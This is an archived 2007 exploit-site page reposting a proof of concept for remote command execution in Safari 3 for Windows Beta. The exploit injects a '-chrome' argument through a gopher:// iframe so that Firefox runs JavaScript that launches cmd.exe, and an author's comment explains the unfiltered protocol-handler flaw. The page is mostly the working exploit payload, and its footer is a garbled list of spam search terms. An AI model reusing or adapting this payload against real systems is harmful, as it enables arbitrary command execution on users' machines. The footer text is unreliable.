about advertise contact
Search: Home Vulnerabilities Exploits News Articles RSS Feeds Archive

exploits , vulnerabilities , articles , Safari 3 for Windows Beta Remote Command Execution PoC




2007-06-13 Safari 3 for Windows Beta Remote Command Execution PoC
Rated as : High Risk

<!--
Safari for Windows, 0day exploit in 2 hours
http://larholm.com/2007/06/12/safari-for-windows-0day-exploit-in-2-hours/
By Thor Larholm

The below PoC exploit will exploit Safari by bouncing through Firefox 
via the Gopher protocol, passing on unfiltered input for the -chrome 
argument that Firefox exposes. When it has done this it will launch 
C:WindowsSystem32cmd.exe with any arguments that have been specified 
in the call to the process.run method. 

It is important to know that, even though this PoC exploit uses Firefox, 
the actual vulnerability is within the lack of input validation for the 
command line arguments handed to the various URL protocol handlers on 
your machine. As such, there are a lot of different attack vectors for 
this vulnerability, I simply chose Firefox and the Gopher URL protocol 
because I was familiar with these. 

I hope you enjoyed the fruits of my 2 hours of labour. Please feel free 
to add my RSS feed to your reader and come back again tomorrow or next 
week for a fresh batch of 0day vulnerabilities :) 

Cheers Thor Larholm 
-->

<html><body>
<iframe src='gopher://larholm.com" -chrome
"javascript:C=Components.classes;I=Components.interfaces;file=C['@mozilla.org/file/local;1'].createInstance(I.nsILocalFile);file.initWithPath('C:'+String.fromCharCode(92)+String.fromCharCode(92)+'Windows'+String.fromCharCode(92)+String.fromCharCode(92)+'System32'+String.fromCharCode(92)+String.fromCharCode(92)+'cmd.exe');process=C['@mozilla.org/process/util;1'].createInstance(I.nsIProcess);process.init(file);process.run(true,{},0);alert(process)'></iframe>process.init(file);process.run(true,{},0);alert(process)
</body></html>
securitydot.net - 2007-06-13

Advertising

Copyright 2007, SecurityDot
Sat, 07 Nov 2009 15:16:29 +0000

Friends : milw0rm.com , secunia.com , securityfocus.com
GOOGLE
NEWS EXPLOITS VULNS
exploits , 0day exploits , newest exploits , vulnerabilities , newest vulnerabilities , 0day vulnerabilities , newest articles , linux articles , articles
200 /compo __ee6__htt bbs.ap520. Nude priya joomla vul www.dglsqq p...oiid.t 200 /compo components crack swat /search/ex Microsoft Carat IV kar 20.inf pushi www.bluefi HOTMAI.COM check poin news for c news for c news for c NetAddAlte indiatamil Www.vidiox Pornoklipo scan admin phpadnew php-nuke 2 vuln/explo chicas de srxey Www.vidiox news for c sexgays Asvareya domai.com girls sex 200 /compo Joomla Com t250t 3com RAS 1 Adaltmovie mambo Remo exploits 4 www.minyua hi.baidu.c ImageHost www.zyquba Www.vidio 52cpp.com